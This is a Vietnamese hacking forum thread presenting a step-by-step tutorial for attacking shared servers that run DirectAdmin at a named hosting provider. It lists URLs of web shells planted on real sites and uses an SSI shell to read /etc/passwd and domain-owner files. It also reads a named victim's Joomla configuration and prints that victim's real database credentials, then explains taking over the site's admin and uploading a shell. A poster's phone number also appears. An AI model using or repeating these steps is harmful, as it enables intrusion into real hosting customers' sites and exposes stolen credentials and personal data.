[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin ) : Kiến thức khác

Xem bài viết chưa trả lời | Xem chủ đề đang hoạt động

Trang chủ » Chia sẻ kiến thức » Kiến thức khác

Thời gian được tính theo giờ UTC + 7 Giờ

[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Các điều hành viên: Admin, Mod, SMod

Bạn đang xem trang 1 / 1 trang

[ 3 bài viết ]

Xem bản in | Gửi Email giới thiệu

Chủ đề trước | Chủ đề kế tiếp

Người gửi

Nội dung

Ghost

Tiêu đề bài viết: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Đã gửi: 02/03/2014 21:25

☀️11/30☀️

Ngày tham gia: 08/12/2012 17:13
Bài viết: 1316
Đến từ: Thanh hóa
Số điện thoại: 01629340152

Trước tiên là cần shell :
http://hyundaicounty.com/images/vic.php< victoria
Không cần để ý tới hàm nó disable bao nhiêu, nhìn vào cái server là được ( dựa theo kinh nghiệm local )
vào check-host.net > check hyundaicounty.com > info
Sẽ ra : Host name ln03.bsg.vn < nó chạy sv bsg
BSG quẩy tốt, sv chạy direct thì chắc chỉ ngại bkns và powernet ( powernet bởi vì ngày trước mình có contact lỗi này cho bên đấy nên nó fix hết quá nhọ
Bây giờ check quyền Server: - id: () - uid= () gid=603() < đủ quyền
Safe_mode : On < không có quyền thực thi lệnh, nhưng không sao bởi vì đối với những sv chạy direct ta chỉ cần hạ quyền xuống apache, chứ đừng thằng nào dại mà symlink sv chạy direct nhé
Khi đổi sang chạy shell = ip/~user thì nó sẽ tự hạ quyền xuống apache, nhưng chắc chắn sẽ không chạy được shell php hoặc perl, nhưng không sao shtml, html vẫn chạy tốt
Giờ ta up 1 con shell shtml lên, và quẩy thôi
http://123.30.181.39/~otohncom/images/ssi.shtml ?
Kiểm tra quyền : id
Sẽ được : uid=101(apache)gid=501(apache)groups=501(apache),503(access)
Quyền đã được hạ, bây giờ ta dùng dir or cat
dir : lệnh xem thư mục trong linux
cat : lệnh xem file trong linux
Xác định victim thực thi lệnh : cat/etc/passwd hoặc cat/etc/virtual/domainowners < đối với server chạy DA
Ví dụ victim : gvth.net user là : vannhan
ta sử dụng : dir -ao/home/vannhan/domains/gvth.net/public_html < để xem thư mục public_html của victim
Tiếp theo tìm config < chưa user pass database của victim
Victim chạy joomla > config sẽ là > configuration.php
Ta sử dụng : cat/home/vannhan/domains/gvth.net/public_html/configuration.php để view source của file configuration.php
Sẽ ra db là :
var $user = 'vannhan_vannhan';
var $db = 'vannhan_dulieu';
var $password = 'WQUnkOZe';
Bước tiếp theo là connect tới mysql bằng http://123.30.181.39/phpmyadmin< chỉ đối với sv chạy DA mới có nhé
Change pass joomla bằng md5 > login vào admin của victim và upload shell
End Tut

_________________

Đặng Lê Minh Nguyên

FACEBOOK

Sửa lần cuối: Ghost 02/03/2014 21:27

Đầu trang

Ghost

Tiêu đề bài viết: Re: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Đã gửi: 02/03/2014 21:28

☀️11/30☀️

Ngày tham gia: 08/12/2012 17:13
Bài viết: 1316
Đến từ: Thanh hóa
Số điện thoại: 01629340152

Thêm tí cho newbie nếu muốn biết sv có chạy DA thì thử xem nó có open port 2222 ko

http://123.30.181.39:2222/

_________________

Đặng Lê Minh Nguyên

FACEBOOK

Đầu trang

Ghost

Tiêu đề bài viết: Re: [hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Đã gửi: 02/03/2014 21:53

☀️11/30☀️

Ngày tham gia: 08/12/2012 17:13
Bài viết: 1316
Đến từ: Thanh hóa
Số điện thoại: 01629340152

Up top..chẳng ai quan tâm..mất công viết bài

_________________

Đặng Lê Minh Nguyên

FACEBOOK

Đầu trang

Bạn đang xem trang 1 / 1 trang

[ 3 bài viết ]

Trang chủ » Chia sẻ kiến thức » Kiến thức khác

Thời gian được tính theo giờ UTC + 7 Giờ

Chủ đề		Người gửi	Trả lời	Xem	Bài viết mới nhất
Chủ đề tương tự
	TUT hack local cơ bản by Soleil	chicanpro	4	1629	23/10/2012 10:27 ANIS1a
	Share Code Chống Local Attacker Cùng Server	Vuonghh1998	0	824	29/02/2016 18:46 Vuonghh1998
	[TUT] Share all tut rip nick facebook 2016 cho anh em đây	Mrtpol02	0	1231	30/04/2016 21:50 Mrtpol02
	Bắt đầu dạy IT - Hacking- WEB cho mem [ Chuyển đến trang: 1, 2, 3 ]	chicanpro	28	4116	23/10/2012 10:01 Zing4teen
	[NEW-TUT] Chỉnh sửa đơn giản để tăng tốc độ load cho UCweb	Ghost	4	1944	01/01/2013 13:30 legendlight
	[Share] Tut checkpass Facebook cho anh em	Mrtpol02	0	944	30/04/2016 22:19 Mrtpol02
	[HELP] Cần PRỒ hướng dẫn em mod server OPERA cho UC	TSNo1ST	0	918	13/07/2014 19:18 TSNo1ST
	[TUT] Tải nhạc chất lượng cao 320kbps miễn phí từ Zing Mp3 [ Chuyển đến trang: 1, 2 ]	LorenKidz	15	6130	13/06/2012 17:06 nhokyoh
	[TUT]Hướng dẫn Mod full giao diện game avatar by coolboy [ Chuyển đến trang: 1, 2 ]	Huyetle	12	7298	12/01/2013 21:24 ~~Hjhjhj~~
	[TUT] hướng dẫn dowload link mediafire bằng UC browser	MrHung	4	2163	22/10/2012 18:51 MrHung

Ai đang trực tuyến?

Đang xem chuyên mục này: Không có thành viên nào đang trực tuyến và 228 khách

Bạn không thể tạo chủ đề mới trong chuyên mục này.
Bạn không thể trả lời bài viết trong chuyên mục này.
Bạn không thể sửa những bài viết của mình trong chuyên mục này.
Bạn không thể xoá những bài viết của mình trong chuyên mục này.

Chuyển đến:

CHIASE123.COM - Diễn đàn chia sẻ kiến thức

[hacking]TUT local BSG ( Chung luôn cho các server chạy directadmin )

Ai đang trực tuyến?